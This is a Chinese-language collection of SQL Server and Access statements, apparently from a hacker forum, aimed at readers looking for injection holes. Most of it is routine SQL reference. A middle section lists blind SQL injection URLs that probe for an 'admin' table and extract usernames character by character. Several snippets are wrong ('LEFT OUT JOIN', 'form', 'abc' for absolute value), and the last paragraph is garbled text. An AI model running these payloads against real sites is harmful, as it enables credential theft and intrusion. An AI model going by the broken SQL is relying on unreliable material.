精妙SQL語句收集

或許大家對注入有一定的瞭解，那麼你是不是知道一些些SQL語言的知識嗎？至少也要會一點吧，手動查找漏洞的朋友或許有此經驗，想學好一技術，得從基礎學起！
這篇文章黑基曾經發貼過這樣的貼，不過看過的人又有多少呢？汗！


SQL語句先前寫的時候，很容易把一些特殊的用法忘記，我特此整理了一下SQL語句操作。
一、基礎

1、說明：創建數據庫
CREATE DATABASE database-name 
2、說明：刪除數據庫
drop database dbname
3、說明：備份sql server
--- 創建 備份數據的 device
USE master
EXEC sp_addumpdevice 'disk', 'testBack', 'c:mssql7backupMyNwind_1.dat'
--- 開始 備份
BACKUP DATABASE pubs TO testBack 
4、說明：創建新表
create table tabname(col1 type1 [not null] [primary key],col2 type2 [not null],..)
根據已有的表創建新表： 
A：create table tab_new like tab_old (使用舊錶創建新表)
B：create table tab_new as select col1,col2… from tab_old definition only
5、說明：刪除新表
drop table tabname 
6、說明：增加一個列
Alter table tabname add column col type
注：列增加後將不能刪除。DB2中列加上後數據類型也不能改變，唯一能改變的是增加varchar類型的長度。
7、說明：添加主鍵： Alter table tabname add primary key(col) 
說明：刪除主鍵： Alter table tabname drop primary key(col) 
8、說明：創建索引：create [unique] index idxname on tabname(col….) 
刪除索引：drop index idxname
注：索引是不可更改的，想更改必須刪除重新建。
9、說明：創建視圖：create view viewname as select statement 
刪除視圖：drop view viewname
10、說明：幾個簡單的基本的sql語句
選擇：select * from table1 where 範圍
插入：insert into table1(field1,field2) values(value1,value2)
刪除：delete from table1 where 範圍
更新：update table1 set field1=value1 where 範圍
查找：select * from table1 where field1 like ’%value1%’ ---like的語法很精妙，查資料!
排序：select * from table1 order by field1,field2 [desc]
總數：select count as totalcount from table1
求和：select sum(field1) as sumvalue from table1
平均：select avg(field1) as avgvalue from table1
最大：select max(field1) as maxvalue from table1
最小：select min(field1) as minvalue from table1
11、說明：幾個高級查詢運算詞
A： UNION 運算符 
UNION 運算符通過組合其他兩個結果表（例如 TABLE1 和 TABLE2）並消去表中任何重複行而派生出一個結果表。當 ALL 隨 UNION 一起使用時（即 UNION ALL），不消除重複行。兩種情況下，派生表的每一行不是來自 TABLE1 就是來自 TABLE2。 
B： EXCEPT 運算符 
EXCEPT 運算符通過包括所有在 TABLE1 中但不在 TABLE2 中的行並消除所有重複行而派生出一個結果表。當 ALL 隨 EXCEPT 一起使用時 (EXCEPT ALL)，不消除重複行。 
C： INTERSECT 運算符
INTERSECT 運算符通過只包括 TABLE1 和 TABLE2 中都有的行並消除所有重複行而派生出一個結果表。當 ALL 隨 INTERSECT 一起使用時 (INTERSECT ALL)，不消除重複行。 
注：使用運算詞的幾個查詢結果行必須是一致的。 
12、說明：使用外連接 
A、left outer join： 
左外連接（左連接）：結果集幾包括連接表的匹配行，也包括左連接表的所有行。 
SQL: select a.a, a.b, a.c, b.c, b.d, b.f from a LEFT OUT JOIN b ON a.a = b.c
B：right outer join: 
右外連接(右連接)：結果集既包括連接表的匹配連接行，也包括右連接表的所有行。 
C：full outer join： 
全外連接：不僅包括符號連接表的匹配行，還包括兩個連接表中的所有記錄。

二、提升

1、說明：複製表(只複製結構,源表名：a 新表名：b) (Access可用)
法一：select * into b from a where 1<>1
法二：select top 0 * into b from a

2、說明：拷貝表(拷貝數據,源表名：a 目標表名：b) (Access可用)
insert into b(a, b, c) select d,e,f from b;

3、說明：跨數據庫之間表的拷貝(具體數據使用絕對路徑) (Access可用)
insert into b(a, b, c) select d,e,f from b in ‘具體數據庫’ where 條件
例子：..from b in '"&Server.MapPath(".")&"data.mdb" &"' where..

4、說明：子查詢(表名1：a 表名2：b)
select a,b,c from a where a IN (select d from b ) 或者: select a,b,c from a where a IN (1,2,3)

5、說明：顯示文章、提交人和最後回覆時間
select a.title,a.username,b.adddate from table a,(select max(adddate) adddate from table where table.title=a.title) b

6、說明：外連接查詢(表名1：a 表名2：b)
select a.a, a.b, a.c, b.c, b.d, b.f from a LEFT OUT JOIN b ON a.a = b.c

7、說明：在線視圖查詢(表名1：a )
select * from (SELECT a,b,c FROM a) T where t.a > 1;

8、說明：between的用法,between限制查詢數據範圍時包括了邊界值,not between不包括
select * from table1 where time between time1 and time2
select a,b,c, from table1 where a not between 數值1 and 數值2

9、說明：in 的使用方法
select * from table1 where a [not] in (‘值1’,’值2’,’值4’,’值6’)

10、說明：兩張關聯表，刪除主表中已經在副表中沒有的信息 
delete from table1 where not exists ( select * from table2 where table1.field1=table2.field1 )

11、說明：四表聯查問題：
select * from a left inner join b on a.a=b.b right inner join c on a.a=c.c inner join d on a.a=d.d where .....

12、說明：日程安排提前五分鐘提醒 
SQL: select * from 日程安排 where datediff('minute',f開始時間,getdate())>5

13、說明：一條sql 語句搞定數據庫分頁
select top 10 b.* from (select top 20 主鍵字段,排序字段 from 表名 order by 排序字段 desc) a,表名 b where b.主鍵字段 = a.主鍵字段 order by a.排序字段

14、說明：前10條記錄
select top 10 * form table1 where 範圍

15、說明：選擇在每一組b值相同的數據中對應的a最大的記錄的所有信息(類似這樣的用法可以用於論壇每月排行榜,每月熱銷產品分析,按科目成績排名,等等.)
select a,b,c from tablename ta where a=(select max(a) from tablename tb where tb.b=ta.b)

16、說明：包括所有在 TableA 中但不在 TableB和TableC 中的行並消除所有重複行而派生出一個結果表
(select a from tableA ) except (select a from tableB) except (select a from tableC)

17、說明：隨機取出10條數據
select top 10 * from tablename order by newid()

18、說明：隨機選擇記錄
select newid()

19、說明：刪除重複記錄
Delete from tablename where id not in (select max(id) from tablename group by col1,col2,...)

20、說明：列出數據庫裏所有的表名
select name from sysobjects where type='U' 

21、說明：列出表裏的所有的
select name from syscolumns where id=object_id('TableName')

22、說明：列示type、vender、pcs字段，以type字段排列，case可以方便地實現多重選擇，類似select 中的case。
select type,sum(case vender when 'A' then pcs else 0 end),sum(case vender when 'C' then pcs else 0 end),sum(case vender when 'B' then pcs else 0 end) FROM tablename group by type
顯示結果：
type vender pcs
電腦 A 1
電腦 A 1
光盤 B 2
光盤 A 2
手機 B 3
手機 C 3

23、說明：初始化表table1

TRUNCATE TABLE table1

24、說明：選擇從10到15的記錄
select top 5 * from (select top 15 * from table order by id asc) table_別名 order by id desc

三、技巧

1、1=1，1=2的使用，在SQL語句組合時用的較多

“where 1=1” 是表示選擇全部   “where 1=2”全部不選，
如：
if @strWhere !='' 
begin
set @strSQL = 'select count(*) as Total from [' + @tblName + '] where ' + @strWhere 
end
else 
begin
set @strSQL = 'select count(*) as Total from [' + @tblName + ']' 
end 

我們可以直接寫成
set @strSQL = 'select count(*) as Total from [' + @tblName + '] where 1=1 安定 '+ @strWhere 

2、收縮數據庫
--重建索引
DBCC REINDEX
DBCC INDEXDEFRAG
--收縮數據和日誌
DBCC SHRINKDB
DBCC SHRINKFILE

3、壓縮數據庫
dbcc shrinkdatabase(dbname)

4、轉移數據庫給新用戶以已存在用戶權限
exec sp_change_users_login 'update_one','newname','oldname'
go

5、檢查備份集
RESTORE VERIFYONLY from disk='E:dvbbs.bak'

6、修復數據庫
ALTER DATABASE [dvbbs] SET SINGLE_USER
GO
DBCC CHECKDB('dvbbs',repair_allow_data_loss) WITH TABLOCK
GO
ALTER DATABASE [dvbbs] SET MULTI_USER
GO

7、日誌清除
SET NOCOUNT ON
DECLARE @LogicalFileName sysname,
    @MaxMinutes INT,
    @NewSize INT


USE   tablename         -- 要操作的數據庫名
SELECT @LogicalFileName = 'tablename_log', -- 日誌文件名
@MaxMinutes = 10,           -- Limit on time allowed to wrap log.
    @NewSize = 1             -- 你想設定的日誌文件的大小(M)

-- Setup / initialize
DECLARE @OriginalSize int
SELECT @OriginalSize = size 
FROM sysfiles
WHERE name = @LogicalFileName
SELECT 'Original Size of ' + db_name() + ' LOG is ' + 
    CONVERT(VARCHAR(30),@OriginalSize) + ' 8K pages or ' + 
    CONVERT(VARCHAR(30),(@OriginalSize*8/1024)) + 'MB'
FROM sysfiles
WHERE name = @LogicalFileName
CREATE TABLE DummyTrans
(DummyColumn char (8000) not null)


DECLARE @Counter   INT,
    @StartTime DATETIME,
    @TruncLog VARCHAR(255)
SELECT @StartTime = GETDATE(),
    @TruncLog = 'BACKUP LOG ' + db_name() + ' WITH TRUNCATE_ONLY'

DBCC SHRINKFILE (@LogicalFileName, @NewSize)
EXEC (@TruncLog)
-- Wrap the log if necessary.
WHILE   @MaxMinutes > DATEDIFF (mi, @StartTime, GETDATE()) -- time has not expired
    AND @OriginalSize = (SELECT size FROM sysfiles WHERE name = @LogicalFileName) 
    AND (@OriginalSize * 8 /1024) > @NewSize 
BEGIN -- Outer loop.
  SELECT @Counter = 0
  WHILE ((@Counter < @OriginalSize / 16) AND (@Counter < 50000))
    BEGIN -- update
    INSERT DummyTrans VALUES ('Fill Log') 
    DELETE DummyTrans
    SELECT @Counter = @Counter + 1
    END   
  EXEC (@TruncLog) 
END   
SELECT 'Final Size of ' + db_name() + ' LOG is ' +
    CONVERT(VARCHAR(30),size) + ' 8K pages or ' + 
    CONVERT(VARCHAR(30),(size*8/1024)) + 'MB'
FROM sysfiles 
WHERE name = @LogicalFileName
DROP TABLE DummyTrans
SET NOCOUNT OFF 

8、說明：更改某個表
exec sp_changeobjectowner 'tablename','dbo'

9、存儲更改全部表

CREATE PROCEDURE dbo.User_ChangeObjectOwnerBatch
@OldOwner as NVARCHAR(128),
@NewOwner as NVARCHAR(128)
AS

DECLARE @Name   as NVARCHAR(128)
DECLARE @Owner as NVARCHAR(128)
DECLARE @OwnerName as NVARCHAR(128)

DECLARE curObject CURSOR FOR 
select 'Name'   = name,
'Owner'   = user_name(uid)
from sysobjects
where user_name(uid)=@OldOwner
order by name

OPEN curObject
FETCH NEXT FROM curObject INTO @Name, @Owner
WHILE(@@FETCH_STATUS=0)
BEGIN   
if @Owner=@OldOwner 
begin
set @OwnerName = @OldOwner + '.' + rtrim(@Name)
exec sp_changeobjectowner @OwnerName, @NewOwner
end
-- select @name,@NewOwner,@OldOwner

FETCH NEXT FROM curObject INTO @Name, @Owner
END

close curObject
deallocate curObject
GO


10、SQL SERVER中直接循環寫入數據
declare @i int
set @i=1
while @i<30
begin
  insert into test (userid) values(@i)
  set @i=@i+1
end

小記存儲過程中經常用到的本週，本月，本年函數 
Dateadd(wk,datediff(wk,0,getdate()),-1) 
Dateadd(wk,datediff(wk,0,getdate()),6) 

Dateadd(mm,datediff(mm,0,getdate()),0) 
Dateadd(ms,-3,dateadd(mm,datediff(m,0,getdate())+1,0)) 

Dateadd(yy,datediff(yy,0,getdate()),0) 
Dateadd(ms,-3,DATEADD(yy, DATEDIFF(yy,0,getdate())+1, 0)) 

上面的SQL代碼只是一個時間段 
Dateadd(wk,datediff(wk,0,getdate()),-1) 
Dateadd(wk,datediff(wk,0,getdate()),6) 
就是表示本週時間段. 
下面的SQL的條件部分,就是查詢時間段在本週範圍內的: 
Where Time BETWEEN Dateadd(wk,datediff(wk,0,getdate()),-1) AND Dateadd(wk,datediff(wk,0,getdate()),6) 
而在存儲過程中 
select @begintime = Dateadd(wk,datediff(wk,0,getdate()),-1) 
select @endtime = Dateadd(wk,datediff(wk,0,getdate()),6)

檢測可否注入 

http://127.0.0.1/xx?id=11 and 1=1 (正常頁面) 

http://127.0.0.1/xx?id=11 and 1=2 (出錯頁面) 


檢測表段的 


http://127.0.0.1/xx?id=11 and exists (select * from admin) 


檢測字段的 


http://127.0.0.1/xx?id=11 and exists (select username from admin) 


檢測ID 


http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1) 


檢測長度的 


http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1) 



檢測長度的 


http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1) 


檢測是否爲MSSQL數據庫 


http://127.0.0.1/xx?id=11 and exists (select * from sysobjects) 


檢測是否爲英文 


(ACCESS數據庫) 

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1) 


(MSSQL數據庫) 

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1) 


檢測英文的範圍 


(ACCESS數據庫) 

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1) 


(MSSQL數據庫) 

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1) 


檢測那個字符 


(ACCESS數據庫) 

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1) 


(MSSQL數據庫) 

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1) 


常用函數 


Access：asc(字符)　SQLServer：unicode(字符) 

作用：返回某字符的ASCII碼 


Access：chr(數字)　SQLServer：nchar(數字) 

作用：與asc相反，根據ASCII碼返回字符 


Access：mid(字符串,N,L)　SQLServer：substring(字符串,N,L) 

作用：返回字符串從N個字符起長度爲L的子字符串，即N到N+L之間的字符串 


Access：abc(數字)　SQLServer：abc (數字) 

作用：返回數字的絕對值（在猜解漢字的時候會用到） 


Access：A between B And C　SQLServer：A between B And C 

作用：判斷A是否界於B與C之間 


and exists(Select top 1 * From 用戶 order by id) 



1.在查詢結果中顯示列名： 

a.用as關鍵字：select name as ’姓名’ from students order by age 

b.直接表示：select name ’姓名’ from students order by age 


2.精確查找: 

a.用in限定範圍：select * from students where native in (’湖南’, ’四川’) 

b.between...and：select * from students where age between 20 and 30 

c.“=”：select * from students where name = ’李山’ 

d.like:select * from students where name like ’李%’ (注意查詢條件中有“%”，則說明是部分匹配，而且還有先後信息在裏面，即查找以“李”開頭的匹配項。所以若查詢有“李”的所有對象，應該命令：’%李%’;若是第二個字爲李，則應爲’_李%’或’_李’或’_李_’。) 

e.[]匹配檢查符：select * from courses where cno like ’[AC]%’ (表示或的關係，與"in(...)"類似，而且"[]"可以表示範圍，如：select * from courses where cno like ’[A-C]%’) 



3.對於時間類型變量的處理 

a.smalldatetime：直接按照字符串處理的方式進行處理，例如：select * from students where birth > = ’1980-1-1’ and birth <= ’1980-12-31’

4.集函數 

a.count()求和，如：select count(*) from students (求學生總人數) 

b.avg(列)求平均， 
如：select avg(mark) from grades where cno=’B2’ 

c.max(列)和min(列)，求最大與最小 


5.分組group 

常用於統計時，如分組查總數：select gender,count(sno) from students group by gender(查看男女學生各有多少) 

注意：從哪種角度分組就從哪列"group by" 

對於多重分組，只需將分組規則羅列。比如查詢各屆各專業的男女同學人數 ，那麼分組規則有：屆別(grade)、專業(mno)和 

性別(gender)，所以有"group by grade, mno, gender" 

select grade, mno, gender, count(*) from students group by grade, mno, gender 

通常group還和having聯用，比如查詢1門課以上不及格的學生，則按學號(sno)分類有： 

select sno,count(*) from grades where mark<60 group by sno having count(*)>1 



6.UNION聯合 

合併查詢結果，如： 

SELECT * FROM students WHERE name like ‘張%’UNION [ALL] SELECT * FROM students WHERE name like ‘李%’ 



7.多表查詢 

a.內連接 

select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno 

(注意可以引用別名) 

b.外連接 

b1.左連接 

select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno 

左連接特點：顯示全部左邊表中的所有項目，即使其中有些項中的數據未填寫完全。 


左外連接返回那些存在於左表而右表中卻沒有的行，再加上內連接的行。 

b2.右連接 

與左連接類似 

b3.全連接 

select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno 

兩邊表中的內容全部顯示 

c.自身連接 

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno 

採用別名解決問題。 

d.交*連接 

select lastname+firstname from lastname CROSS JOIN firstanme 

相當於做笛卡兒積 



8.嵌套查詢 

a.用關鍵字IN,如查詢豬豬山的同鄉： 

select * from students where native in (select native from students where name=’豬豬’) 

b.使用關鍵字EXIST,比如，下面兩句是等價的： 

select * from students where sno in (select sno from grades where cno=’B2’) 


select * from students where exists (select * from grades where grades.sno=students.sno AND cno=’B2’) 



9.關於排序order 

a.對於排序order，有兩種方法：asc升序和desc降序 

b.對於排序order,可以按照查詢條件中的某項排列，而且這項可用數字表示，如： 

select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3 


10.其他 

a.對於有空格的識別名稱，應該用"[]"括住。 

b.對於某列中沒有數據的特定查詢可以用null判斷，如select sno,courseno from grades where mark IS NULL 

c.注意區分在嵌套查詢中使用的any與all的區別，any相當於邏輯運算“||”而all則相當於邏輯運算“&&” 

d.注意在做否定意義的查詢是小心進入陷阱： 

如，沒有選修‘B2’課程的學生 ： 

select students.* from students, grades where students.sno=grades.sno AND grades.cno <> ’B2’ 

上面的查詢方式是錯誤的，正確方式見下方： 

select * from students where not exists (select * from grades where grades.sno=students.sno AND cno=’B2’) 


11.關於有難度多重嵌套查詢的解決思想：如，選修了全睝@緯痰難?br>select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno)) 

最外一重：從學生表中選，排除那些有課沒選的。用not exist。由於討論對象是課程，所以第二重查詢從course表中找，排除那些選了課的即可